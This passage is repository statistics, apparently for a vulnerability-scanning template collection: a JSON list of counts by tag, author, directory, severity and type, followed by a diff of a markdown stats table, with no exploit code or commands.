":1},{"name":"connect-central","count":1},{"name":"memory-pipes","count":1},{"name":"oam","count":1},{"name":"emlog","count":1},{"name":"dapp","count":1},{"name":"comfortel","count":1},{"name":"lfw","count":1},{"name":"scs","count":1},{"name":"abuseipdb","count":1},{"name":"wallix","count":1},{"name":"processwire","count":1},{"name":"kerio","count":1},{"name":"projectdiscovery","count":1},{"name":"phabricator","count":1},{"name":"trane","count":1},{"name":"nette","count":1},{"name":"jupyterhub","count":1},{"name":"intelx","count":1},{"name":"mi","count":1},{"name":"cobub","count":1},{"name":"sauter","count":1},{"name":"bullwark","count":1},{"name":"h5s","count":1},{"name":"getgrav","count":1},{"name":"nearby","count":1},{"name":"xyxel","count":1},{"name":"projector","count":1},{"name":"malshare","count":1},{"name":"tamronos","count":1},{"name":"opensearch","count":1},{"name":"phpminiadmin","count":1},{"name":"flowci","count":1},{"name":"argocd","count":1},{"name":"opsview","count":1},{"name":"microcomputers","count":1},{"name":"unauthenticated","count":1},{"name":"binaryedge","count":1},{"name":"webpconverter","count":1},{"name":"qualcomm","count":1},{"name":"bitrise","count":1},{"name":"trilium","count":1},{"name":"remkon","count":1},{"name":"ptr","count":1},{"name":"tugboat","count":1},{"name":"web3storage","count":1},{"name":"hivemanager","count":1},{"name":"hanming","count":1},{"name":"xenmobile","count":1},{"name":"droneci","count":1},{"name":"aniapi","count":1},{"name":"mofi","count":1},{"name":"commscope","count":1},{"name":"roundcube","count":1},{"name":"ocs-inventory","count":1},{"name":"raspberrymatic","count":1},{"name":"woody","count":1},{"name":"gsoap","count":1},{"name":"arl","count":1},{"name":"guppy","count":1},{"name":"mpsec","count":1},{"name":"ucp","count":1},{"name":"server","count":1},{"name":"serverstatus","count":1},{"name":"rconfig.exposure","count":1},{"name":"myanimelist","count":1},{"name":"viaware","count":1},{"name":"sefile","count":1},{"name":"containers","count":1},{"name":"emerson","count":1},{"name":"hunter","count":1},{"name":"i3geo","count":1},{"name":"finereport","count":1},{"name":"hiboss","count":1},{"name":"maccmsv10","count":1},{"name":"activeadmin","count":1},{"name":"iconfinder","count":1},{"name":"omni","count":1},{"name":"openssl","count":1},{"name":"shibboleth","count":1},{"name":"anchorcms","count":1},{"name":"plc","count":1},{"name":"webui","count":1},{"name":"openerp","count":1},{"name":"gerapy","count":1},{"name":"jnoj","count":1},{"name":"meraki","count":1},{"name":"leostream","count":1},{"name":"syncthru","count":1},{"name":"contentful","count":1},{"name":"route","count":1},{"name":"wordcloud","count":1},{"name":"proxykingdom","count":1},{"name":"zap","count":1},{"name":"workresources","count":1},{"name":"ganglia","count":1},{"name":"tinypng","count":1},{"name":"netweaver","count":1},{"name":"buddy","count":1},{"name":"axxonsoft","count":1},{"name":"mappress","count":1},{"name":"telecom","count":1},{"name":"ip2whois","count":1},{"name":"biometrics","count":1},{"name":"owncloud","count":1}],"authors":[{"name":"daffainfo","count":631},{"name":"dhiyaneshdk","count":584},{"name":"pikpikcu","count":329},{"name":"pdteam","count":269},{"name":"geeknik","count":187},{"name":"dwisiswant0","count":169},{"name":"0x_akoko","count":165},{"name":"princechaddha","count":151},{"name":"ritikchaddha","count":137},{"name":"pussycat0x","count":133},{"name":"gy741","count":126},{"name":"arafatansari","count":79},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":60},{"name":"akincibor","count":46},{"name":"gaurang","count":42},{"name":"for3stco1d","count":38},{"name":"philippedelteil","count":36},{"name":"adam crosser","count":30},{"name":"c-sh0","count":26},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"righettod","count":22},{"name":"ffffffff0x","count":22},{"name":"techbrunchfr","count":21},{"name":"edoardottt","count":17},{"name":"cckuailong","count":17},{"name":"pr3r00t","count":15},{"name":"sullo","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"sharath","count":13},{"name":"0ri2n","count":13},{"name":"tenbird","count":13},{"name":"johnk3r","count":12},{"name":"melbadry9","count":12},{"name":"suman_kar","count":12},{"name":"elsfa7110","count":11},{"name":"wdahlenb","count":11},{"name":"cyllective","count":11},{"name":"random-robbie","count":11},{"name":"dogasantos","count":11},{"name":"hackergautam","count":10},{"name":"tess","count":10},{"name":"nadino","count":10},{"name":"random_robbie","count":10},{"name":"alph4byt3","count":10},{"name":"meme-lord","count":10},{"name":"oppsec","count":9},{"name":"emadshanab","count":9},{"name":"0x240x23elu","count":9},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"logicalhunter","count":8},{"name":"amit-jd","count":7},{"name":"techryptic (@tech)","count":7},{"name":"caspergn","count":7},{"name":"randomstr1ng","count":7},{"name":"leovalcante","count":7},{"name":"harshbothra_","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"divya_mudgal","count":7},{"name":"pathtaga","count":6},{"name":"evan rubinstein","count":6},{"name":"pentest_swissky","count":6},{"name":"iamnoooob","count":6},{"name":"veshraj","count":6},{"name":"__fazal","count":6},{"name":"forgedhallpass","count":6},{"name":"puzzlepeaches","count":6},{"name":"rootxharsh","count":6},{"name":"_0xf4n9x_","count":6},{"name":"imnightmaree","count":6},{"name":"nullfuzz","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"lu4nx","count":5},{"name":"podalirius","count":5},{"name":"joanbono","count":5},{"name":"xelkomy","count":5},{"name":"nodauf","count":5},{"name":"scent2d","count":4},{"name":"h1ei1","count":4},{"name":"defr0ggy","count":4},{"name":"dolev farhi","count":4},{"name":"tanq16","count":4},{"name":"incogbyte","count":4},{"name":"dadevel","count":4},{"name":"r3naissance","count":4},{"name":"e_schultze_","count":4},{"name":"wisnupramoedya","count":4},{"name":"3th1c_yuk1","count":4},{"name":"splint3r7","count":3},{"name":"z3bd","count":3},{"name":"fyoorer","count":3},{"name":"jarijaas","count":3},{"name":"unstabl3","count":3},{"name":"thomas_from_offensity","count":3},{"name":"atomiczsec","count":3},{"name":"andydoering","count":3},{"name":"mr-xn","count":3},{"name":"emenalf","count":3},{"name":"dudez","count":3},{"name":"powerexploit","count":3},{"name":"supras","count":3},{"name":"alifathi-h1","count":3},{"name":"binaryfigments","count":3},{"name":"ph33r","count":3},{"name":"f1tz","count":3},{"name":"_generic_human_","count":3},{"name":"lark-lab","count":3},{"name":"davidmckennirey","count":3},{"name":"shifacyclewala","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"gitlab red team","count":3},{"name":"johnjhacking","count":3},{"name":"lucasljm2001","count":3},{"name":"dr0pd34d","count":3},{"name":"ekrause","count":3},{"name":"its0x08","count":3},{"name":"whoever","count":3},{"name":"mavericknerd","count":3},{"name":"sushantkamble","count":3},{"name":"me9187","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"fxploit","count":3},{"name":"arcc","count":3},{"name":"hahwul","count":3},{"name":"skeltavik","count":3},{"name":"cocxanh","count":2},{"name":"manas_harsh","count":2},{"name":"0xcrypto","count":2},{"name":"afaq","count":2},{"name":"dheerajmadhukar","count":2},{"name":"raesene","count":2},{"name":"lotusdll","count":2},{"name":"0xrudra","count":2},{"name":"g4l1t0","count":2},{"name":"ree4pwn","count":2},{"name":"666asd","count":2},{"name":"hackerarpan","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"kre80r","count":2},{"name":"convisoappsec","count":2},{"name":"danielmofer","count":2},{"name":"prajiteshsingh","count":2},{"name":"gevakun","count":2},{"name":"y4er","count":2},{"name":"smaranchand","count":2},{"name":"ajaysenr","count":2},{"name":"n-thumann","count":2},{"name":"sy3omda","count":2},{"name":"dahse89","count":2},{"name":"0xprial","count":2},{"name":"paperpen","count":2},{"name":"v0idc0de","count":2},{"name":"nuk3s3c","count":2},{"name":"ambassify","count":2},{"name":"hetroublemakr","count":2},{"name":"geekby","count":2},{"name":"k11h-de","count":2},{"name":"socketz","count":2},{"name":"sbani","count":2},{"name":"kiblyn11","count":2},{"name":"foulenzer","count":2},{"name":"0xnirvana","count":2},{"name":"swissky","count":2},{"name":"huowuzhao","count":2},{"name":"martincodes-de","count":2},{"name":"0xelkomy","count":2},{"name":"fabaff","count":2},{"name":"moritz nentwig","count":2},{"name":"koti2","count":2},{"name":"zomsop82","count":2},{"name":"thezakman","count":2},{"name":"0xsmiley","count":2},{"name":"joshlarsen","count":2},{"name":"dbrwsky","count":2},{"name":"bananabr","count":2},{"name":"github.com/its0x08","count":2},{"name":"0xsapra","count":2},{"name":"brenocss","count":2},{"name":"rafaelwdornelas","count":2},{"name":"z0ne","count":2},{"name":"clarkvoss","count":2},{"name":"cckuakilong","count":2},{"name":"nvn1729","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"redteambrasil","count":2},{"name":"codexlynx","count":2},{"name":"thardt-praetorian","count":2},{"name":"bp0lr","count":2},{"name":"paradessia","count":2},{"name":"joeldeleep","count":2},{"name":"w4cky_","count":2},{"name":"gal nagli","count":2},{"name":"bernardofsr","count":2},{"name":"randomrobbie","count":2},{"name":"vsh00t","count":2},{"name":"ehsahil","count":2},{"name":"luci","count":2},{"name":"badboycxcc","count":2},{"name":"myztique","count":2},{"name":"r12w4n","count":2},{"name":"amsda","count":2},{"name":"uomogrande","count":2},{"name":"mohammedsaneem","count":2},{"name":"pxmme1337","count":2},{"name":"taielab","count":2},{"name":"bing0o","count":2},{"name":"parth","count":2},{"name":"nkxxkn","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"udit_thakkur","count":2},{"name":"d4vy","count":2},{"name":"vavkamil","count":2},{"name":"bsysop","count":2},{"name":"x1m_martijn","count":2},{"name":"ooooooo_q","count":1},{"name":"push4d","count":1},{"name":"0xceba","count":1},{"name":"compr00t","count":1},{"name":"blckraven","count":1},{"name":"bad5ect0r","count":1},{"name":"_c0wb0y_","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"lixts","count":1},{"name":"elitebaz","count":1},{"name":"anon-artist","count":1},{"name":"schniggie","count":1},{"name":"prettyboyaaditya","count":1},{"name":"mubassirpatel","count":1},{"name":"dawid-czarnecki","count":1},{"name":"majidmc2","count":1},{"name":"soyelmago","count":1},{"name":"sherlocksecurity","count":1},{"name":"w0tx","count":1},{"name":"x6263","count":1},{"name":"rodnt","count":1},{"name":"pdp","count":1},{"name":"xeldax","count":1},{"name":"hexcat","count":1},{"name":"liquidsec","count":1},{"name":"tirtha_mandal","count":1},{"name":"elouhi","count":1},{"name":"2rs3c","count":1},{"name":"djoevanka","count":1},{"name":"arm!tage","count":1},{"name":"0xrod","count":1},{"name":"izn0u","count":1},{"name":"shreyapohekar","count":1},{"name":"retr02332","count":1},{"name":"luskabol","count":1},{"name":"rubina119","count":1},{"name":"iampritam","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"skylark-lab","count":1},{"name":"miroslavsotak","count":1},{"name":"nielsing","count":1},{"name":"elder tao","count":1},{"name":"yashanand155","count":1},{"name":"ringo","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"amnotacat","count":1},{"name":"undefl0w","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"_darrenmartyn","count":1},{"name":"un-fmunozs","count":1},{"name":"mah3sec_","count":1},{"name":"brabbit10","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"thevillagehacker","count":1},{"name":"aaronchen0","count":1},{"name":"absshax","count":1},{"name":"noobexploiter","count":1},{"name":"justmumu","count":1},{"name":"mantissts","count":1},{"name":"phyr3wall","count":1},{"name":"tirtha","count":1},{"name":"jiheon-dev","count":1},{"name":"hakluke","count":1},{"name":"tim_koopmans","count":1},{"name":"ahmed abou-ela","count":1},{"name":"marcos_iaf","count":1},{"name":"c3l3si4n","count":1},{"name":"kr1shna4garwal","count":1},{"name":"s0obi","count":1},{"name":"b4uh0lz","count":1},{"name":"natto97","count":1},{"name":"shelld3v","count":1},{"name":"husain","count":1},{"name":"danigoland","count":1},{"name":"droberson","count":1},{"name":"noraj","count":1},{"name":"thesubtlety","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"iphantasmic","count":1},{"name":"furkansayim","count":1},{"name":"elmahdi","count":1},{"name":"unkl4b","count":1},{"name":"ph33rr","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"rotembar","count":1},{"name":"borna nematzadeh","count":1},{"name":"bernardo rodrigues @bernardofsr | andrรฉ monteiro @am0nt31r0","count":1},{"name":"0h1in9e","count":1},{"name":"geraldino2","count":1},{"name":"nytr0gen","count":1},{"name":"ola456","count":1},{"name":"jcockhren","count":1},{"name":"apt-mirror","count":1},{"name":"p-l-","count":1},{"name":"aringo","count":1},{"name":"davidfegyver","count":1},{"name":"hakimkt","count":1},{"name":"nerrorsec","count":1},{"name":"patralos","count":1},{"name":"fopina","count":1},{"name":"whynotke","count":1},{"name":"evolutionsec","count":1},{"name":"zhenwarx","count":1},{"name":"xshuden","count":1},{"name":"th3.d1p4k","count":1},{"name":"failopen","count":1},{"name":"jbaines-r7","count":1},{"name":"xstp","count":1},{"name":"sickwell","count":1},{"name":"mrcl0wnlab","count":1},{"name":"ptonewreckin","count":1},{"name":"shifacyclewla","count":1},{"name":"noamrathaus","count":1},{"name":"berkdusunur","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"infosecsanyam","count":1},{"name":"zinminphy0","count":1},{"name":"alex","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"mhdsamx","count":1},{"name":"manasmbellani","count":1},{"name":"regala_","count":1},{"name":"screamy","count":1},{"name":"orpheus","count":1},{"name":"yavolo","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"erethon","count":1},{"name":"andysvints","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0ut0fb4nd","count":1},{"name":"andirrahmani1","count":1},{"name":"micha3lb3n","count":1},{"name":"charanrayudu","count":1},{"name":"nobody","count":1},{"name":"httpvoid","count":1},{"name":"toufik-airane","count":1},{"name":"_harleo","count":1},{"name":"adrianmf","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"daviey","count":1},{"name":"affix","count":1},{"name":"willd96","count":1},{"name":"daffianfo","count":1},{"name":"jbertman","count":1},{"name":"opencirt","count":1},{"name":"akshansh","count":1},{"name":"d0rkerdevil","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"ilovebinbash","count":1},{"name":"petruknisme","count":1},{"name":"yashgoti","count":1},{"name":"kailashbohara","count":1},{"name":"piyushchhiroliya","count":1},{"name":"arjunchandarana","count":1},{"name":"aresx","count":1},{"name":"alexrydzak","count":1},{"name":"arall","count":1},{"name":"fq_hsu","count":1},{"name":"jeya seelan","count":1},{"name":"ling","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"kh4sh3i","count":1},{"name":"co0nan","count":1},{"name":"ok_bye_now","count":1},{"name":"juicypotato1","count":1},{"name":"0xceeb","count":1},{"name":"narluin","count":1},{"name":"lark lab","count":1},{"name":"clment cruchet","count":1},{"name":"arr0way","count":1},{"name":"remonsec","count":1},{"name":"makyotox","count":1},{"name":"vzamanillo","count":1},{"name":"j33n1k4","count":1},{"name":"f1she3","count":1},{"name":"sec_hawk","count":1},{"name":"kiks7","count":1},{"name":"gboddin","count":1},{"name":"lamscun","count":1},{"name":"jrolf","count":1},{"name":"zandros0","count":1},{"name":"miryangjung","count":1},{"name":"jas37","count":1},{"name":"paper-pen","count":1},{"name":"official_blackhat13","count":1},{"name":"vinit989","count":1},{"name":"act1on3","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"bywalks","count":1},{"name":"ohlinge","count":1},{"name":"sicksec","count":1},{"name":"ricardomaia","count":1},{"name":"b0yd","count":1},{"name":"oscarintherocks","count":1},{"name":"coldfish","count":1},{"name":"igibanez","count":1},{"name":"dievus","count":1},{"name":"h4kux","count":1},{"name":"maximus decimus","count":1},{"name":"manuelbua","count":1},{"name":"intx0x80","count":1},{"name":"mesaglio","count":1},{"name":"retr0","count":1},{"name":"fmunozs","count":1},{"name":"wabafet","count":1},{"name":"alperenkesk","count":1},{"name":"mass0ma","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"francescocarlucci","count":1},{"name":"cookiehanhoan","count":1},{"name":"deena","count":1},{"name":"ldionmarcil","count":1},{"name":"true13","count":1},{"name":"hardik-rathod","count":1},{"name":"pratik khalane","count":1},{"name":"bughuntersurya","count":1},{"name":"kurohost","count":1},{"name":"amanrawat","count":1},{"name":"momen eldawakhly","count":1},{"name":"wlayzz","count":1},{"name":"kabirsuda","count":1},{"name":"0xh7ml","count":1},{"name":"alevsk","count":1},{"name":"evan rubinstien","count":1},{"name":"pudsec","count":1},{"name":"florianmaak","count":1},{"name":"philippdelteil","count":1},{"name":"luqmaan hadia","count":1},{"name":"b0rn2r00t","count":1},{"name":"0xtavian","count":1},{"name":"hanlaomo","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"zsusac","count":1},{"name":"bjhulst","count":1},{"name":"dhiyaneshdki","count":1},{"name":"qlkwej","count":1},{"name":"thebinitghimire","count":1},{"name":"jeya.seelan","count":1},{"name":"duty_1g","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"exid","count":1},{"name":"korteke","count":1},{"name":"knassar702","count":1},{"name":"ggranjus","count":1},{"name":"akash.c","count":1},{"name":"rojanrijal","count":1},{"name":"pjborah","count":1},{"name":"streetofhackerr007","count":1},{"name":"furkansenan","count":1},{"name":"harshinsecurity","count":1},{"name":"notnotnotveg","count":1},{"name":"omarkurt","count":1},{"name":"ipanda","count":1},{"name":"notsoevilweasel","count":1},{"name":"ofjaaah","count":1},{"name":"rschio","count":1},{"name":"revblock","count":1},{"name":"kaizensecurity","count":1},{"name":"yuansec","count":1},{"name":"exceed","count":1},{"name":"flag007","count":1},{"name":"1nf1n7y","count":1},{"name":"pry0cc","count":1},{"name":"open-sec","count":1},{"name":"lethargynavigator","count":1},{"name":"osamahamad","count":1},{"name":"exploitation","count":1},{"name":"5up3r541y4n","count":1},{"name":"ahmed sherif","count":1},{"name":"chron0x","count":1},{"name":"0xd0ff9","count":1},{"name":"becivells","count":1},{"name":"higor melgaรงo (eremit4)","count":1},{"name":"kareemse1im","count":1},{"name":"calumjelrick","count":1},{"name":"s1r1u5_","count":1},{"name":"tea","count":1},{"name":"sshell","count":1},{"name":"udyz","count":1},{"name":"0xteles","count":1},{"name":"luqman","count":1},{"name":"bartu utku sarp","count":1},{"name":"breno_css","count":1},{"name":"ahmetpergamum","count":1}],"directory":[{"name":"cves","count":1407},{"name":"exposed-panels","count":662},{"name":"vulnerabilities","count":509},{"name":"technologies","count":282},{"name":"exposures","count":275},{"name":"misconfiguration","count":237},{"name":"token-spray","count":230},{"name":"workflows","count":189},{"name":"default-logins","count":103},{"name":"file","count":76},{"name":"takeovers","count":68},{"name":"iot","count":39},{"name":"network","count":37},{"name":"cnvd","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":7},{"name":"ssl","count":5}],"severity":[{"name":"info","count":1474},{"name":"high","count":1009},{"name":"medium","count":818},{"name":"critical","count":478},{"name":"low","count":225},{"name":"unknown","count":11}],"types":[{"name":"http","count":3858},{"name":"file","count":76},{"name":"network","count":51},{"name":"dns","count":17}]}
diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md
index 202c85dca8..bdea6b2136 100644
--- a/TEMPLATES-STATS.md
+++ b/TEMPLATES-STATS.md
@@ -1,1555 +1,1952 @@
-| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
-|----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 |
-| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 |
-| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 |
-| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 |
-| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | |
-| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | |
-| rce | 291 | princechaddha | 133 | workflows | 186 | | | | |
-| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | |
-| tech | 271 | gy741 | 118 | default-logins | 95 | | | | |
-| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | |
-| cve2020 | 197 | madrobot | 65 | takeovers | 67 | | | | |
-| | 188 | zzeitlin | 64 | iot | 38 | | | | |
-| token-spray | 154 | idealphase | 47 | network | 35 | | | | |
-| joomla | 131 | ritikchaddha | 42 | miscellaneous | 23 | | | | |
-| config | 126 | gaurang | 42 | cnvd | 22 | | | | |
-| cve2018 | 121 | philippedelteil | 36 | dns | 17 | | | | |
-| apache | 120 | adam crosser | 30 | fuzzing | 12 | | | | |
-| cve2019 | 118 | ice3man | 26 | headless | 6 | | | | |
-| cve2010 | 111 | organiccrap | 24 | ssl | 4 | | | | |
-| default-login | 110 | c-sh0 | 23 | | | | | | |
-| unauth | 108 | ffffffff0x | 22 | | | | | | |
-| iot | 102 | akincibor | 20 | | | | | | |
-| oast | 97 | righettod | 18 | | | | | | |
-| login | 85 | cckuailong | 17 | | | | | | |
-| takeover | 73 | for3stco1d | 16 | | | | | | |
-| token | 72 | pr3r00t | 15 | | | | | | |
-| redirect | 71 | sheikhrishad | 15 | | | | | | |
-| misconfig | 65 | techbrunchfr | 14 | | | | | | |
-| cve2017 | 64 | r3dg33k | 14 | | | | | | |
-| cve2022 | 63 | milo2012 | 14 | | | | | | |
-| sqli | 62 | sharath | 13 | | | | | | |
-| ssrf | 61 | suman_kar | 12 | | | | | | |
-| file | 60 | sullo | 12 | | | | | | |
-| wp | 55 | wdahlenb | 11 | | | | | | |
-| network | 53 | melbadry9 | 11 | | | | | | |
-| router | 52 | cyllective | 11 | | | | | | |
-| oracle | 50 | nadino | 10 | | | | | | |
-| disclosure | 45 | alph4byt3 | 10 | | | | | | |
-| cve2016 | 45 | meme-lord | 10 | | | | | | |
-| plugin | 40 | johnk3r | 10 | | | | | | |
-| auth-bypass | 39 | hackergautam | 10 | | | | | | |
-| cve2014 | 37 | random_robbie | 10 | | | | | | |
-| google | 36 | edoardottt | 9 | | | | | | |
-| cve2015 | 36 | emadshanab | 9 | | | | | | |
-| cisco | 35 | dogasantos | 9 | | | | | | |
-| authenticated | 35 | zh | 8 | | | | | | |
-| logs | 33 | that_juan_ | 8 | | | | | | |
-| atlassian | 32 | iamthefrogy | 8 | | | | | | |
-| injection | 30 | aashiq | 8 | | | | | | |
-| listing | 30 | harshbothra_ | 7 | | | | | | |
-| jira | 30 | techryptic (@tech) | 7 | | | | | | |
-| traversal | 29 | logicalhunter | 7 | | | | | | |
-| devops | 28 | 0x240x23elu | 7 | | | | | | |
-| generic | 26 | kophjager007 | 7 | | | | | | |
-| kubernetes | 25 | divya_mudgal | 7 | | | | | | |
-| adobe | 24 | randomstr1ng | 7 | | | | | | |
-| springboot | 24 | dr_set | 7 | | | | | | |
-| cms | 24 | random-robbie | 7 | | | | | | |
-| oss | 24 | oppsec | 7 | | | | | | |
-| proxy | 22 | pathtaga | 6 | | | | | | |
-| cnvd | 22 | leovalcante | 6 | | | | | | |
-| sap | 22 | iamnoooob | 6 | | | | | | |
-| microsoft | 21 | rootxharsh | 6 | | | | | | |
-| vmware | 21 | caspergn | 6 | | | | | | |
-| intrusive | 21 | __fazal | 6 | | | | | | |
-| debug | 21 | pentest_swissky | 6 | | | | | | |
-| aem | 21 | forgedhallpass | 6 | | | | | | |
-| misc | 21 | puzzlepeaches | 6 | | | | | | |
-| wp-theme | 20 | evan rubinstein | 6 | | | | | | |
-| service | 20 | ganofins | 5 | | | | | | |
-| fuzz | 20 | _0xf4n9x_ | 5 | | | | | | |
-| manageengine | 19 | xelkomy | 5 | | | | | | |
-| cve2012 | 19 | panch0r3d | 5 | | | | | | |
-| zoho | 18 | elsfa7110 | 5 | | | | | | |
-| php | 18 | imnightmaree | 5 | | | | | | |
-| dns | 18 | praetorian-thendrickson | 5 | | | | | | |
-| aws | 17 | yanyun | 5 | | | | | | |
-| tomcat | 17 | joanbono | 5 | | | | | | |
-| weblogic | 17 | lu4nx | 5 | | | | | | |
-| deserialization | 17 | podalirius | 5 | | | | | | |
-| k8s | 16 | defr0ggy | 4 | | | | | | |
-| ibm | 16 | nodauf | 4 | | | | | | |
-| struts | 16 | incogbyte | 4 | | | | | | |
-| gitlab | 15 | dadevel | 4 | | | | | | |
-| jenkins | 15 | tess | 4 | | | | | | |
-| dlink | 15 | wisnupramoedya | 4 | | | | | | |
-| cve2011 | 15 | dolev farhi | 4 | | | | | | |
-| fileupload | 14 | tanq16 | 4 | | | | | | |
-| xxe | 14 | e_schultze_ | 4 | | | | | | |
-| cve2009 | 14 | h1ei1 | 4 | | | | | | |
-| hp | 14 | me9187 | 3 | | | | | | |
-| android | 14 | andydoering | 3 | | | | | | |
-| java | 14 | shifacyclewala | 3 | | | | | | |
-| api | 14 | sushantkamble | 3 | | | | | | |
-| ruijie | 13 | f1tz | 3 | | | | | | |
-| firewall | 13 | r3naissance | 3 | | | | | | |
-| camera | 13 | jarijaas | 3 | | | | | | |
-| cve2013 | 12 | emenalf | 3 | | | | | | |
-| lfr | 12 | binaryfigments | 3 | | | | | | |
-| netsweeper | 12 | z3bd | 3 | | | | | | |
-| rails | 12 | whoever | 3 | | | | | | |
-| log4j | 12 | impramodsargar | 3 | | | | | | |
-| nginx | 12 | johnjhacking | 3 | | | | | | |
-| printer | 12 | _generic_human_ | 3 | | | | | | |
-| status | 12 | unstabl3 | 3 | | | | | | |
-| upload | 11 | yash anand @yashanand155 | 3 | | | | | | |
-| netgear | 11 | supras | 3 | | | | | | |
-| graphql | 11 | github.com/its0x08 | 3 | | | | | | |
-| cnvd2021 | 11 | mr-xn | 3 | | | | | | |
-| magento | 11 | fyoorer | 3 | | | | | | |
-| glpi | 10 | thomas_from_offensity | 3 | | | | | | |
-| grafana | 10 | 0w4ys | 3 | | | | | | |
-| spring | 10 | davidmckennirey | 3 | | | | | | |
-| jolokia | 10 | dudez | 3 | | | | | | |
-| backup | 10 | gitlab red team | 3 | | | | | | |
-| auth | 10 | arcc | 3 | | | | | | |
-| dell | 10 | shine | 3 | | | | | | |
-| fortigate | 10 | veshraj | 3 | | | | | | |
-| airflow | 10 | skeltavik | 3 | | | | | | |
-| coldfusion | 10 | mavericknerd | 3 | | | | | | |
-| github | 9 | alifathi-h1 | 3 | | | | | | |
-| jndi | 9 | lark-lab | 3 | | | | | | |
-| mirai | 9 | yuzhe-zhang-0 | 3 | | | | | | |
-| wso2 | 9 | cocxanh | 2 | | | | | | |
-| fastjson | 9 | bananabr | 2 | | | | | | |
-| iis | 9 | paperpen | 2 | | | | | | |
-| cve2008 | 9 | its0x08 | 2 | | | | | | |
-| laravel | 9 | ajaysenr | 2 | | | | | | |
-| woocommerce | 9 | smaranchand | 2 | | | | | | |
-| fortinet | 9 | dahse89 | 2 | | | | | | |
-| zabbix | 9 | 0xcrypto | 2 | | | | | | |
-| ftp | 9 | mohammedsaneem | 2 | | | | | | |
-| drupal | 9 | 0xsapra | 2 | | | | | | |
-| webserver | 9 | pxmme1337 | 2 | | | | | | |
-| windows | 9 | nkxxkn | 2 | | | | | | |
-| phpmyadmin | 8 | gal nagli | 2 | | | | | | |
-| metadata | 8 | nuk3s3c | 2 | | | | | | |
-| audit | 8 | z0ne | 2 | | | | | | |
-| bypass | 8 | convisoappsec | 2 | | | | | | |
-| django | 8 | x1m_martijn | 2 | | | | | | |
-| solr | 8 | r12w4n | 2 | | | | | | |
-| azure | 8 | swissky | 2 | | | | | | |
-| zyxel | 8 | udit_thakkur | 2 | | | | | | |
-| amazon | 8 | kre80r | 2 | | | | | | |
-| confluence | 8 | lotusdll | 2 | | | | | | |
-| prometheus | 8 | thardt-praetorian | 2 | | | | | | |
-| scada | 8 | splint3r7 | 2 | | | | | | |
-| citrix | 8 | ree4pwn | 2 | | | | | | |
-| vcenter | 8 | ambassify | 2 | | | | | | |
-| blind | 8 | randomrobbie | 2 | | | | | | |
-| exchange | 7 | zomsop82 | 2 | | | | | | |
-| python | 7 | geekby | 2 | | | | | | |
-| kube | 7 | dheerajmadhukar | 2 | | | | | | |
-| bucket | 7 | bernardofsr | 2 | | | | | | |
-| rconfig | 7 | koti2 | 2 | | | | | | |
-| firebase | 7 | 0xrudra | 2 | | | | | | |
-| mail | 7 | bsysop | 2 | | | | | | |
-| vpn | 7 | hassan khan yusufzai - | 2 | | | | | | |
-| | | splint3r7 | | | | | | | |
-| maps | 7 | vsh00t | 2 | | | | | | |
-| elasticsearch | 7 | luci | 2 | | | | | | |
-| ssti | 7 | paradessia | 2 | | | | | | |
-| sonicwall | 7 | 0xsmiley | 2 | | | | | | |
-| files | 7 | k11h-de | 2 | | | | | | |
-| squirrelmail | 7 | kiblyn11 | 2 | | | | | | |
-| kafka | 7 | moritz nentwig | 2 | | | | | | |
-| cicd | 6 | afaq | 2 | | | | | | |
-| cnvd2020 | 6 | cckuakilong | 2 | | | | | | |
-| jetty | 6 | sy3omda | 2 | | | | | | |
-| go | 6 | danielmofer | 2 | | | | | | |
-| cobbler | 6 | sbani | 2 | | | | | | |
-| zimbra | 6 | g4l1t0 | 2 | | | | | | |
